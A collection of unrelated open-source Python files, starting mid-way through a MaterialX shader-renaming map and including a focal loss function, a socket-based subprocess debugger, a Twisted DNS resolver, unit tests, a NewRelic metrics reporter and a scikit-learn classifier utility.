"MaterialX/mx_contrast_color2" : "MaterialX/mx_contrast_color2_color2",
"MaterialX/mx_contrast_color4" : "MaterialX/mx_contrast_color4_color4",
"MaterialX/mx_contrast_float" : "MaterialX/mx_contrast_float_float",
"MaterialX/mx_contrast_vector" : "MaterialX/mx_contrast_vector_vector",
"MaterialX/mx_contrast_vector2" : "MaterialX/mx_contrast_vector2_vector2",
"MaterialX/mx_contrast_vector4" : "MaterialX/mx_contrast_vector4_vector4",
"MaterialX/mx_divide_color" : "MaterialX/mx_divide_color_color",
"MaterialX/mx_divide_color2" : "MaterialX/mx_divide_color2_color2",
"MaterialX/mx_divide_color4" : "MaterialX/mx_divide_color4_color4",
"MaterialX/mx_divide_float" : "MaterialX/mx_divide_float_float",
"MaterialX/mx_divide_vector" : "MaterialX/mx_divide_vector_vector",
"MaterialX/mx_divide_vector2" : "MaterialX/mx_divide_vector2_vector2",
"MaterialX/mx_divide_vector4" : "MaterialX/mx_divide_vector4_vector4",
"MaterialX/mx_invert_color" : "MaterialX/mx_invert_color_color",
"MaterialX/mx_invert_color2" : "MaterialX/mx_invert_color2_color2",
"MaterialX/mx_invert_color4" : "MaterialX/mx_invert_color4_color4",
"MaterialX/mx_invert_float" : "MaterialX/mx_invert_float_float",
"MaterialX/mx_invert_vector" : "MaterialX/mx_invert_vector_vector",
"MaterialX/mx_invert_vector2" : "MaterialX/mx_invert_vector2_vector2",
"MaterialX/mx_invert_vector4" : "MaterialX/mx_invert_vector4_vector4",
"MaterialX/mx_max_color" : "MaterialX/mx_max_color_color",
"MaterialX/mx_max_color2" : "MaterialX/mx_max_color2_color2",
"MaterialX/mx_max_color4" : "MaterialX/mx_max_color4_color4",
"MaterialX/mx_max_float" : "MaterialX/mx_max_float_float",
"MaterialX/mx_max_vector" : "MaterialX/mx_max_vector_vector",
"MaterialX/mx_max_vector2" : "MaterialX/mx_max_vector2_vector2",
"MaterialX/mx_max_vector4" : "MaterialX/mx_max_vector4_vector4",
"MaterialX/mx_min_color" : "MaterialX/mx_min_color_color",
"MaterialX/mx_min_color2" : "MaterialX/mx_min_color2_color2",
"MaterialX/mx_min_color4" : "MaterialX/mx_min_color4_color4",
"MaterialX/mx_min_float" : "MaterialX/mx_min_float_float",
"MaterialX/mx_min_vector" : "MaterialX/mx_min_vector_vector",
"MaterialX/mx_min_vector2" : "MaterialX/mx_min_vector2_vector2",
"MaterialX/mx_min_vector4" : "MaterialX/mx_min_vector4_vector4",
"MaterialX/mx_modulo_color" : "MaterialX/mx_modulo_color_color",
"MaterialX/mx_modulo_color2" : "MaterialX/mx_modulo_color2_color2",
"MaterialX/mx_modulo_color4" : "MaterialX/mx_modulo_color4_color4",
"MaterialX/mx_modulo_float" : "MaterialX/mx_modulo_float_float",
"MaterialX/mx_modulo_vector" : "MaterialX/mx_modulo_vector_vector",
"MaterialX/mx_modulo_vector2" : "MaterialX/mx_modulo_vector2_vector2",
"MaterialX/mx_modulo_vector4" : "MaterialX/mx_modulo_vector4_vector4",
"MaterialX/mx_multiply_color" : "MaterialX/mx_multiply_color_color",
"MaterialX/mx_multiply_color2" : "MaterialX/mx_multiply_color2_color2",
"MaterialX/mx_multiply_color4" : "MaterialX/mx_multiply_color4_color4",
"MaterialX/mx_multiply_float" : "MaterialX/mx_multiply_float_float",
"MaterialX/mx_multiply_vector" : "MaterialX/mx_multiply_vector_vector",
"MaterialX/mx_multiply_vector2" : "MaterialX/mx_multiply_vector2_vector2",
"MaterialX/mx_multiply_vector4" : "MaterialX/mx_multiply_vector4_vector4",
"MaterialX/mx_remap_color" : "MaterialX/mx_remap_color_color",
"MaterialX/mx_remap_color2" : "MaterialX/mx_remap_color2_color2",
"MaterialX/mx_remap_color4" : "MaterialX/mx_remap_color4_color4",
"MaterialX/mx_remap_float" : "MaterialX/mx_remap_float_float",
"MaterialX/mx_remap_vector" : "MaterialX/mx_remap_vector_vector",
"MaterialX/mx_remap_vector2" : "MaterialX/mx_remap_vector2_vector2",
"MaterialX/mx_remap_vector4" : "MaterialX/mx_remap_vector4_vector4",
"MaterialX/mx_smoothstep_color" : "MaterialX/mx_smoothstep_color_color",
"MaterialX/mx_smoothstep_color2" : "MaterialX/mx_smoothstep_color2_color2",
"MaterialX/mx_smoothstep_color4" : "MaterialX/mx_smoothstep_color4_color4",
"MaterialX/mx_smoothstep_float" : "MaterialX/mx_smoothstep_float_float",
"MaterialX/mx_smoothstep_vector" : "MaterialX/mx_smoothstep_vector_vector",
"MaterialX/mx_smoothstep_vector2" : "MaterialX/mx_smoothstep_vector2_vector2",
"MaterialX/mx_smoothstep_vector4" : "MaterialX/mx_smoothstep_vector4_vector4",
"MaterialX/mx_subtract_color" : "MaterialX/mx_subtract_color_color",
"MaterialX/mx_subtract_color2" : "MaterialX/mx_subtract_color2_color2",
"MaterialX/mx_subtract_color4" : "MaterialX/mx_subtract_color4_color4",
"MaterialX/mx_subtract_float" : "MaterialX/mx_subtract_float_float",
"MaterialX/mx_subtract_vector" : "MaterialX/mx_subtract_vector_vector",
"MaterialX/mx_subtract_vector2" : "MaterialX/mx_subtract_vector2_vector2",
"MaterialX/mx_subtract_vector4" : "MaterialX/mx_subtract_vector4_vector4",
}
def __loadShaderWrapper( originalLoadShader ) :
def loadRenamedShader( self, shaderName, **kwargs ) :
renamed = __nameMapping.get( shaderName, shaderName )
return originalLoadShader( self, renamed, **kwargs )
return loadRenamedShader
GafferOSL.OSLShader.loadShader = __loadShaderWrapper( GafferOSL.OSLShader.loadShader )
|
maskrcnn_benchmark/layers/focal_loss.py | sergiev/ContourNet | 211 | 12686114 | <reponame>sergiev/ContourNet
import torch
from torch import nn
from torch.nn import functional as F
def Focal_Loss(pred, gt):
# print('yes!!')
ce = nn.CrossEntropyLoss()
alpha = 0.25
gamma = 2
# logp = ce(input, target)
p = torch.sigmoid(pred)
loss = -alpha * (1 - p) ** gamma * (gt * torch.log(p)) - \
(1 - alpha) * p ** gamma * ((1 - gt) * torch.log(1 - p))
return loss.mean()
# pred =torch.sigmoid(pred)
# pos_inds = gt.eq(1).float()
# neg_inds = gt.lt(1).float()
#
# loss = 0
#
# pos_loss = torch.log(pred + 1e-10) * torch.pow(pred, 2) * pos_inds
# # neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds
# neg_loss = torch.log(1 - pred) * torch.pow(1 - pred, 2) * neg_inds
#
# num_pos = pos_inds.float().sum()
# num_neg = neg_inds.float().sum()
#
# pos_loss = pos_loss.sum()
# neg_loss = neg_loss.sum()
#
# if num_pos == 0:
# loss = loss - neg_loss
# else:
# # loss = loss - (pos_loss + neg_loss) / (num_pos)
# loss = loss - (pos_loss + neg_loss )
# return loss * 5
# if weight is not None and weight.sum() > 0:
# return (losses * weight).sum() / weight.sum()
# else:
# assert losses.numel() != 0
# return losses.mean() |
run_dir/subprocessdebugger.py | classerase/polygott | 370 | 12686124 | <filename>run_dir/subprocessdebugger.py<gh_stars>100-1000
import os
import json
import select
import socket
import subprocess
import sys
import tempfile
import remotedebugger
if sys.version_info[0] == 2:
raise ValueError("Wrong Python version! This script is for Python 3.")
class DebuggerSocket():
def __init__(self, socket):
self.socket = socket
self.buffer = b''
def fileno(self):
return self.socket.fileno()
def parse_message(self):
if b'\n' in self.buffer:
data, self.buffer = self.buffer.split(b'\n', 1)
msg = json.loads(data.decode('utf8'))
return msg
def on_read(self):
"""Reads bytes off the wire and returns all contained messages"""
data = self.socket.recv(1024)
if not data:
raise subprocess.SubprocessError('Subprocess disconnected')
self.buffer += data
msgs = []
while True:
msg = self.parse_message()
if msg:
msgs.append(msg)
else:
break
return msgs
class DebuggerProcess(object):
def __init__(self, program):
self.temp_dir = tempfile.TemporaryDirectory()
self.filename = os.path.join(self.temp_dir.name, 'usermodule.py')
with open(self.filename, 'w') as f:
f.write(program)
host, port = ('127.0.0.1', 1234)
listen_socket = socket.socket()
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
listen_socket.bind((host, port))
listen_socket.listen(1)
self.p = subprocess.Popen([
sys.executable,
os.path.abspath(remotedebugger.__file__),
'--host', host,
'--port', str(port),
'--connect',
'--file',
self.filename,
],
stdin=subprocess.PIPE,
# use real stdout/stderr for printing errors
)
self.messages = []
self.done = False
self.s, _ = listen_socket.accept()
listen_socket.close()
self.debuggerSocket = DebuggerSocket(self.s)
self.has_already_stepped_once = False
def send(self, kind):
msg = json.dumps({'kind': kind}).encode('utf8')+b'\n'
self.s.sendall(msg)
def step(self):
"""Yields messages until current stack is returned.
Yielded messages will be of one of these types
* {kind: 'stdout', data: 'data'} when the process writes to stdout
* (kind: 'stderr', data: 'data') when the process writes to stderr
* (kind: 'error', data: 'Traceback ...'}
The first step does not step, it just returns the first stack.
"""
if self.done:
return 'done'
elif self.has_already_stepped_once:
self.send('step')
else:
self.has_already_stepped_once = True
yield from self.update_stack()
return 'done' if self.done else self.stack
def update_stack(self):
stack_or_done = yield from self._get_stack()
if stack_or_done == 'done':
self.done = True
self.stack = []
else:
self.stack = stack_or_done
def _get_stack(self):
"""Returns a list of stack frame {lineno, functionName}, or 'done'"""
for kind, payload in self.get_subproc_msgs('stack'):
if kind == 'stack':
stack = payload
elif kind == 'stdout':
yield (kind, payload)
elif kind == 'stderr':
yield (kind, payload)
elif kind == 'done':
return 'done'
elif kind == 'error':
yield ('error', payload)
return 'done'
else:
raise ValueError("Unexpected message: "+repr((kind, payload)))
return stack
def get_subproc_msgs(self, kind='stack'):
"""Yields subprocess messages until the requested message is received.
This method also forwards stdin bytes to the debugger subprocess,
so it's important to use it instead of a (blocking) self.s.recv()
"""
readers = [self.debuggerSocket, sys.stdin]
while True:
rs, _, _ = select.select(readers, [], [])
for reader in rs:
if reader is sys.stdin:
self.p.stdin.write(bytearray(reader.readline(), 'utf-8'))
elif reader is self.debuggerSocket:
msgs = self.debuggerSocket.on_read()
for msg in msgs:
yield (msg['kind'], msg['data'])
if msg['kind'] == kind:
return
def cleanup(self):
self.s.close()
self.p.stdin.close()
self.p.kill()
self.temp_dir.cleanup()
def __enter__(self):
return self
def __exit__(self, *args):
self.cleanup()
def __del__(self):
self.cleanup()
|
lib/carbon/resolver.py | hessu/carbon | 961 | 12686148 | <gh_stars>100-1000
import random
from zope.interface import implementer
from twisted.internet._resolver import GAIResolver
from twisted.internet.defer import Deferred
from twisted.internet.address import IPv4Address
from twisted.internet.interfaces import IResolverSimple, IResolutionReceiver
from twisted.internet.error import DNSLookupError
# Inspired from /twisted/internet/_resolver.py
@implementer(IResolutionReceiver)
class RandomWins(object):
"""
An L{IResolutionReceiver} which fires a L{Deferred} with a random result.
"""
def __init__(self, deferred):
"""
@param deferred: The L{Deferred} to fire with one resolution
result arrives.
"""
self._deferred = deferred
self._results = []
def resolutionBegan(self, resolution):
"""
See L{IResolutionReceiver.resolutionBegan}
@param resolution: See L{IResolutionReceiver.resolutionBegan}
"""
self._resolution = resolution
def addressResolved(self, address):
"""
See L{IResolutionReceiver.addressResolved}
@param address: See L{IResolutionReceiver.addressResolved}
"""
self._results.append(address.host)
def resolutionComplete(self):
"""
See L{IResolutionReceiver.resolutionComplete}
"""
if self._results:
random.shuffle(self._results)
self._deferred.callback(self._results[0])
else:
self._deferred.errback(DNSLookupError(self._resolution.name))
@implementer(IResolverSimple)
class ComplexResolverSimplifier(object):
"""
A converter from L{IHostnameResolver} to L{IResolverSimple}
"""
def __init__(self, nameResolver):
"""
Create a L{ComplexResolverSimplifier} with an L{IHostnameResolver}.
@param nameResolver: The L{IHostnameResolver} to use.
"""
self._nameResolver = nameResolver
def getHostByName(self, name, timeouts=()):
"""
See L{IResolverSimple.getHostByName}
@param name: see L{IResolverSimple.getHostByName}
@param timeouts: see L{IResolverSimple.getHostByName}
@return: see L{IResolverSimple.getHostByName}
"""
result = Deferred()
self._nameResolver.resolveHostName(RandomWins(result), name, 0,
[IPv4Address])
return result
def setUpRandomResolver(reactor):
resolver = GAIResolver(reactor, reactor.getThreadPool)
reactor.installResolver(ComplexResolverSimplifier(resolver))
|
pypy/module/unicodedata/test/test_hyp.py | nanjekyejoannah/pypy | 333 | 12686226 | <filename>pypy/module/unicodedata/test/test_hyp.py
import sys
import pytest
try:
from hypothesis import given, strategies as st, example, settings, assume
except ImportError:
pytest.skip("hypothesis required")
from pypy.module.unicodedata.interp_ucd import ucd
from rpython.rlib.rutf8 import codepoints_in_utf8
def make_normalization(space, NF_code):
def normalize(s):
u = s.encode('utf8')
w_s = space.newutf8(u, codepoints_in_utf8(u))
w_res = ucd.normalize(space, NF_code, w_s)
return space.utf8_w(w_res).decode('utf8')
return normalize
all_forms = ['NFC', 'NFD', 'NFKC', 'NFKD']
# For every (n1, n2, n3) triple, applying n1 then n2 must be the same
# as applying n3.
# Reference: http://unicode.org/reports/tr15/#Design_Goals
compositions = [
('NFC', 'NFC', 'NFC'),
('NFC', 'NFD', 'NFD'),
('NFC', 'NFKC', 'NFKC'),
('NFC', 'NFKD', 'NFKD'),
('NFD', 'NFC', 'NFC'),
('NFD', 'NFD', 'NFD'),
('NFD', 'NFKC', 'NFKC'),
('NFD', 'NFKD', 'NFKD'),
('NFKC', 'NFC', 'NFKC'),
('NFKC', 'NFD', 'NFKD'),
('NFKC', 'NFKC', 'NFKC'),
('NFKC', 'NFKD', 'NFKD'),
('NFKD', 'NFC', 'NFKC'),
('NFKD', 'NFD', 'NFKD'),
('NFKD', 'NFKC', 'NFKC'),
('NFKD', 'NFKD', 'NFKD'),
]
@pytest.mark.parametrize('NF1, NF2, NF3', compositions)
@example(s=u'---\uafb8\u11a7---') # issue 2289
@settings(max_examples=1000)
@given(s=st.text())
def test_composition(s, space, NF1, NF2, NF3):
# 'chr(0xfacf) normalizes to chr(0x2284a), which is too big')
assume(not (s == u'\ufacf' and sys.maxunicode == 65535))
norm1, norm2, norm3 = [make_normalization(space, form) for form in [NF1, NF2, NF3]]
assert norm2(norm1(s)) == norm3(s)
if sys.maxunicode != 65535:
# conditionally generate the example via an unwrapped decorator
test_composition = example(s=u'\ufacf')(test_composition)
|
src/models/sequence/rnns/__init__.py | dumpmemory/state-spaces | 513 | 12686249 | # Expose the cell registry and load all possible cells
from .cells.basic import CellBase
from .cells import basic
from .cells import hippo
from .cells import timestamp
from . import sru
|
test/sanity/issue4493-win-open-size/test.py | frank-dspeed/nw.js | 27,296 | 12686263 | <gh_stars>1000+
import time
import os
import platform
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
# open first time
print 'Open first time'
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(10)
try:
print driver.current_url
size = driver.find_element_by_id('size').get_attribute('innerHTML')
print 'open size %s' % size
driver.find_element_by_id('resize-window').click()
size = driver.find_element_by_id('resize').get_attribute('innerHTML')
print 'resize to %s' % size
finally:
driver.quit()
# open second time
print 'Open second time'
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(10)
try:
print driver.current_url
size = driver.find_element_by_id('size').get_attribute('innerHTML')
print 'open size %s' % size
assert(size == '666x333' or size == '667x334')
finally:
driver.quit()
|
pyformance/reporters/newrelic_reporter.py | boarik/pyformance | 167 | 12686279 | # -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import socket
import sys
from pyformance.registry import set_global_registry, MetricsRegistry
if sys.version_info[0] > 2:
import urllib.request as urllib
import urllib.error as urlerror
else:
import urllib2 as urllib
import urllib2 as urlerror
from pyformance.__version__ import __version__
from .reporter import Reporter
DEFAULT_CARBON_SERVER = "0.0.0.0"
DEFAULT_CARBON_PORT = 2003
class NewRelicSink(object):
def __init__(self):
self.total = 0
self.count = 0
self.min = None
self.max = None
self.sum_of_squares = 0
def add(self, seconds):
self.total += seconds
self.count += 1
self.sum_of_squares += seconds * seconds
self.min = min(self.min, seconds) if self.min else seconds
self.max = max(self.max, seconds) if self.max else seconds
pass
class NewRelicRegistry(MetricsRegistry):
def create_sink(self):
return NewRelicSink()
set_global_registry(NewRelicRegistry())
class NewRelicReporter(Reporter):
"""
Reporter for new relic
"""
MAX_METRICS_PER_REQUEST = 10000
PLATFORM_URL = "https://platform-api.newrelic.com/platform/v1/metrics"
def __init__(
self,
license_key,
registry=None,
name=socket.gethostname(),
reporting_interval=5,
prefix="",
clock=None,
):
super(NewRelicReporter, self).__init__(registry, reporting_interval, clock)
self.name = name
self.prefix = prefix
self.http_headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"X-License-Key": license_key,
}
def report_now(self, registry=None, timestamp=None):
metrics = self.collect_metrics(registry or self.registry)
if metrics:
try:
# XXX: better use http-keepalive/pipelining somehow?
request = urllib.Request(
self.PLATFORM_URL,
metrics.encode() if sys.version_info[0] > 2 else metrics,
)
for k, v in self.http_headers.items():
request.add_header(k, v)
result = urllib.urlopen(request)
if isinstance(result, urlerror.HTTPError):
raise result
except Exception as e:
print(e, file=sys.stderr)
@property
def agent_data(self):
"""Return the agent data section of the NewRelic Platform data payload
:rtype: dict
"""
return {
"host": socket.gethostname(),
"pid": os.getpid(),
"version": __version__,
}
def create_metrics(self, registry):
results = {}
# noinspection PyProtectedMember
timers = registry._timers
for key in timers:
sink = timers[key].sink
if not sink.count:
continue
full_key = "Component/%s%s" % (self.prefix, key)
results[full_key.replace(".", "/")] = {
"total": sink.total,
"count": sink.count,
"min": sink.min,
"max": sink.max,
"sum_of_squares": sink.sum_of_squares,
}
sink.__init__()
return results
def collect_metrics(self, registry):
body = {
"agent": self.agent_data,
"components": [
{
"guid": "com.github.pyformance",
"name": self.name,
"duration": self.reporting_interval,
"metrics": self.create_metrics(registry),
}
],
}
return json.dumps(body, ensure_ascii=False, sort_keys=True)
|
osquery/plugin.py | eoinmiller-r7/osquery-python | 274 | 12686282 | <gh_stars>100-1000
"""This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
# pylint: disable=no-self-use
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod
from future.utils import with_metaclass
from osquery.singleton import Singleton
class BasePlugin(with_metaclass(ABCMeta, Singleton)):
"""All osquery plugins should inherit from BasePlugin"""
@abstractmethod
def call(self, context):
"""Call is the method that is responsible for routing a thrift request
to the appropriate class method.
This must be implemented by the plugin type (ie: LoggerPlugin), but
explicitly not an end-user plugin type (ie: MyAwesomeLoggerPlugin)
call should return an ExtensionResponse, as defined in osquery.thrift
"""
raise NotImplementedError
@abstractmethod
def name(self):
"""The name of your plugin.
This must be implemented by your plugin.
"""
raise NotImplementedError
def routes(self):
"""The routes that should be broadcasted by your plugin"""
return []
|
constrained_language_typology/scikit_classifier.py | deepneuralmachine/google-research | 23,901 | 12686290 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple sckit-learn classification utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import math
import pickle
from absl import flags
from absl import logging
import numpy as np
from sklearn import model_selection
from sklearn.compose import make_column_transformer
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import RidgeClassifier
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.naive_bayes import GaussianNB
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
# pylint: disable=invalid-name
flags.DEFINE_boolean(
"transform_inputs", True,
"If enabled, will scale the numeric features and convert categorical "
"features to one-hot encoding.")
flags.DEFINE_list(
"classifiers", ["LogisticRegression"],
"Type of the classifier. One of: \"LogisticRegression\", \"SVM\", "
"\"RidgeRegression\", \"RandomForest\", \"AdaBoost\", \"LDA\", \"QDA\", "
"\"GaussianProcess\", \"DecisionTree\", \"DNN\", \"GaussianNaiveBayes\", "
"\"BaggingEnsemble\".")
flags.DEFINE_boolean(
"use_implicationals", True, "If True, use the implicational features.")
flags.DEFINE_string(
"best_configurations_file", "",
"File containing the JSON dictionary from feature names to the "
"respective best model and data configurations. When `--cross_validate` "
"is enabled, this is the output file to be generated. In all other modes "
"this is an input file.")
FLAGS = flags.FLAGS
# List of all supported classifiers.
ALL_MODELS = [
"AdaBoost", "DNN", "DecisionTree", "GaussianProcess", "LDA",
"LogisticRegression", "QDA", "RandomForest", "RidgeRegression", "SVM",
"GaussianNaiveBayes", "BaggingEnsemble"
]
# Model information keys.
MODEL_INFO_NAME_KEY = "name"
MODEL_INFO_SPARSITY_KEY = "no_cv" # Not enough data.
MODEL_INFO_SCORE_KEY = "accuracy"
MODEL_INFO_CANDIDATES_KEY = "candidates"
# Random seed.
_RANDOM_STATE = 4611170
# WALS language code.
_LANGUAGE_CODE = "wals_code"
def _prepare_data(input_df):
"""Splits data into features and labels."""
class_label = "target_value"
y = input_df[class_label].copy()
X_columns_to_drop = [class_label, _LANGUAGE_CODE, "target_feature"]
X = input_df.drop(columns=X_columns_to_drop)
return X, y
def _split_into_features_and_labels(feature_name, feature_maker,
training_df, dev_df,
transform_inputs):
"""Preprocesses the data and returns the features and labels."""
# Get the label class counts for the training data.
train_class_counts = training_df.target_value.value_counts()
train_class_counts = list(zip(train_class_counts.index,
train_class_counts.values))
logging.info("%s: Class counts: %s", feature_name, train_class_counts)
# Perform the split into features and labels of the training set.
X_train, y_train = _prepare_data(training_df)
logging.info("%s: Input feature dimensions: %s", feature_name,
X_train.shape[1])
# Split dev set.
X_dev, y_dev = _prepare_data(dev_df)
# Numeric columns are transformed using standard scaler and categorical
# columns are converted to one-hot.
if transform_inputs:
numeric_cols = ["latitude", "longitude"]
categorical_cols = []
for col_name in X_train.columns:
if (col_name in feature_maker.prob_features or
col_name in feature_maker.count_features):
numeric_cols.append(col_name) # Counts, probabilities.
elif col_name in feature_maker.categorical_features:
categorical_cols.append(col_name) # Categorical feature values.
inputs_transformer = make_column_transformer(
(StandardScaler(), numeric_cols),
(OneHotEncoder(handle_unknown="ignore"), categorical_cols),
remainder="passthrough")
X_train = inputs_transformer.fit_transform(X_train)
if X_dev.shape[0]: # Do we have enough samples?
X_dev = inputs_transformer.transform(X_dev)
else:
logging.warning("Feature %s not found in the dev set. This is likely to "
"crash the evaluation mode!", feature_name)
else:
# Transform data frames to Numpy. The input transformer in the branch above
# returns Numpy arrays.
X_train = X_train.to_numpy()
X_dev = X_dev.to_numpy()
return (
X_train, y_train.to_numpy(), X_dev, y_dev.to_numpy(), train_class_counts)
def prepare_data(feature_maker, feature_name, use_implicationals=True,
prediction_mode=False):
"""Prepares the features and labels for the given WALS feature name."""
# Process training and dev data for the feature. Store the WALS language codes
# for the development set aside.
training_df, dev_df = feature_maker.process_data(
feature_name, prediction_mode=prediction_mode)
assert _LANGUAGE_CODE in dev_df.columns
dev_language_codes = list(dev_df[_LANGUAGE_CODE].values)
if not use_implicationals:
logging.info("Discarding implicational features")
training_df = feature_maker.select_columns(training_df,
discard_implicationals=True)
dev_df = feature_maker.select_columns(dev_df,
discard_implicationals=True)
# Split the data into features and labels.
X_train, y_train, X_dev, y_dev, train_class_counts = (
_split_into_features_and_labels(
feature_name, feature_maker, training_df, dev_df,
FLAGS.transform_inputs))
return X_train, y_train, X_dev, y_dev, dev_language_codes, train_class_counts
def _make_classifier(classifier_name):
"""Classifier factory."""
# Class weights: if you set this to None, you'd get much better accuracies,
# but it's likely that the classifier will be overpredicting the majority
# class.
class_weight_strategy = None # Note: this may set "balanced" as default.
max_iters = 10000
if classifier_name == "AdaBoost":
model = AdaBoostClassifier(n_estimators=100)
elif classifier_name == "LogisticRegression":
model = LogisticRegression(max_iter=max_iters,
class_weight=class_weight_strategy)
elif classifier_name == "LDA":
model = LinearDiscriminantAnalysis(tol=1E-6)
elif classifier_name == "QDA":
model = QuadraticDiscriminantAnalysis()
elif classifier_name == "DNN":
model = MLPClassifier(random_state=_RANDOM_STATE,
hidden_layer_sizes=[200])
elif classifier_name == "DecisionTree":
model = DecisionTreeClassifier(random_state=_RANDOM_STATE,
min_samples_leaf=3,
criterion="entropy",
class_weight="balanced")
elif classifier_name == "GaussianProcess":
model = GaussianProcessClassifier(random_state=_RANDOM_STATE,
max_iter_predict=200)
elif classifier_name == "RandomForest":
model = RandomForestClassifier(n_estimators=200,
random_state=_RANDOM_STATE,
min_samples_leaf=3,
criterion="entropy",
class_weight="balanced_subsample")
elif classifier_name == "RidgeRegression":
model = RidgeClassifier(normalize=True, tol=1E-5,
class_weight=class_weight_strategy)
elif classifier_name == "SVM":
model = LinearSVC(max_iter=max_iters, class_weight=class_weight_strategy)
elif classifier_name == "GaussianNaiveBayes":
model = GaussianNB()
elif classifier_name == "BaggingEnsemble":
model = BaggingClassifier(random_state=_RANDOM_STATE)
else:
raise ValueError("Unsupported classifier: %s" % classifier_name)
return model
def cross_validate(feature_name, classifier_name, X, y,
cv_num_folds, cv_num_repeats):
"""Runs repeated stratified $k$-fold cross-validation.
Returns multiple cross-validation metrics as a dictionary, where for each
metric mean and variance across multiple repeats and folds is summarized.
Args:
feature_name: (string) Name of the WALS feature.
classifier_name: (string) Classifier name.
X: (numpy array) Input features.
y: (numpy array) Labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing cross-validation scores and stats.
"""
model = _make_classifier(classifier_name)
scoring = ["f1_micro", "precision_micro", "recall_micro", "accuracy"]
try:
# Really primitive logic to figure out class distribution.
_, y_counts = np.unique(y, return_counts=True)
y_max_freq = np.max(y_counts)
# Check if the class counts are not reliable to run cross-validation.
if y_max_freq < cv_num_folds:
logging.warning("[%s] %s: Not enough data. Fitting the model instead "
"of running CV", feature_name, classifier_name)
# Simply fit the model.
model.fit(X, y)
cv_scores = {}
cv_scores["accuracy"] = (model.score(X, y), 0.0)
cv_scores[MODEL_INFO_SPARSITY_KEY] = True
return cv_scores
else:
logging.info("[%s] Running cross-validation of %s (k=%d, n=%d) ...",
feature_name, classifier_name, cv_num_folds, cv_num_repeats)
# Run cross-validation.
cv = RepeatedStratifiedKFold(n_splits=cv_num_folds,
n_repeats=cv_num_repeats,
random_state=_RANDOM_STATE)
cv_scores = model_selection.cross_validate(
model, X, y, cv=cv, scoring=scoring, n_jobs=cv_num_folds)
cv_scores[MODEL_INFO_SPARSITY_KEY] = False
except Exception as e: # pylint: disable=broad-except
logging.error("[%s] %s: CV: Exception: %s", feature_name, classifier_name,
e)
return None
del cv_scores["fit_time"]
del cv_scores["score_time"]
for score_name in scoring:
scores_vec_key = "test_" + score_name
cv_scores[score_name] = (np.mean(cv_scores[scores_vec_key]),
np.var(cv_scores[scores_vec_key]))
del cv_scores[scores_vec_key]
# Sanity check.
if math.isnan(cv_scores["accuracy"][0]):
return None
logging.info("[train] %s: CV scores for %s: %s", feature_name,
classifier_name, cv_scores)
return cv_scores
def train_classifier(feature_name, classifier_name, X, y, model_path=None):
"""Trains classifier."""
model = _make_classifier(classifier_name)
logging.info("%s: Fitting %s model ...",
feature_name, classifier_name)
model.fit(X, y)
logging.info("%s: %s: Score: %s", feature_name, classifier_name,
model.score(X, y))
if model_path:
logging.info("Saving model to \"%s\" ...", model_path)
pickle.dump(model, open(model_path, "wb"))
return model
def select_best_model(classifiers, feature_name, X_train, y_train,
cv_num_folds, cv_num_repeats):
"""Performs cross-validation of various classifiers for a given feature.
Returns a dictionary with the best classifier name, its score and the number
of candidates it was selected from.
Args:
classifiers: (list) Names of the classifiers to choose from.
feature_name: (string) WALS feature name.
X_train: (numpy array) Training features.
y_train: (numpy array) Training labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing best configuration.
"""
scores = []
for classifier_name in classifiers:
clf_scores = cross_validate(feature_name, classifier_name, X_train, y_train,
cv_num_folds, cv_num_repeats)
if clf_scores: # Cross-validation may fail for some settings.
scores.append((classifier_name, clf_scores))
# Sort the scores by the highest accuracy mean. For some reason F1 and
# accuracy are the same (as is the precision and recall). Investigate.
scores = sorted(scores, key=lambda score: score[1]["accuracy"][0],
reverse=True)
if len(scores) < 5:
raise ValueError("Expected at least five candidate classifiers!")
best_model = scores[0]
return {
MODEL_INFO_NAME_KEY: best_model[0], # Model name.
# Accuracy mean.
MODEL_INFO_SCORE_KEY: best_model[1]["accuracy"][0],
# Boolean sparsity marker.
MODEL_INFO_SPARSITY_KEY: best_model[1][MODEL_INFO_SPARSITY_KEY],
# Overall number of successful evals.
MODEL_INFO_CANDIDATES_KEY: len(scores)
}
|
modules/core/sublime_event_loop.py | timfjord/sublime_debugger | 225 | 12686291 | <filename>modules/core/sublime_event_loop.py<gh_stars>100-1000
from __future__ import annotations
import asyncio
import sublime
import threading
class Handle:
def __init__(self, callback, args):
self.callback = callback
self.args = args
def __call__(self):
if self.callback:
self.callback(*self.args)
def cancel(self):
self.callback = None
self.args = None
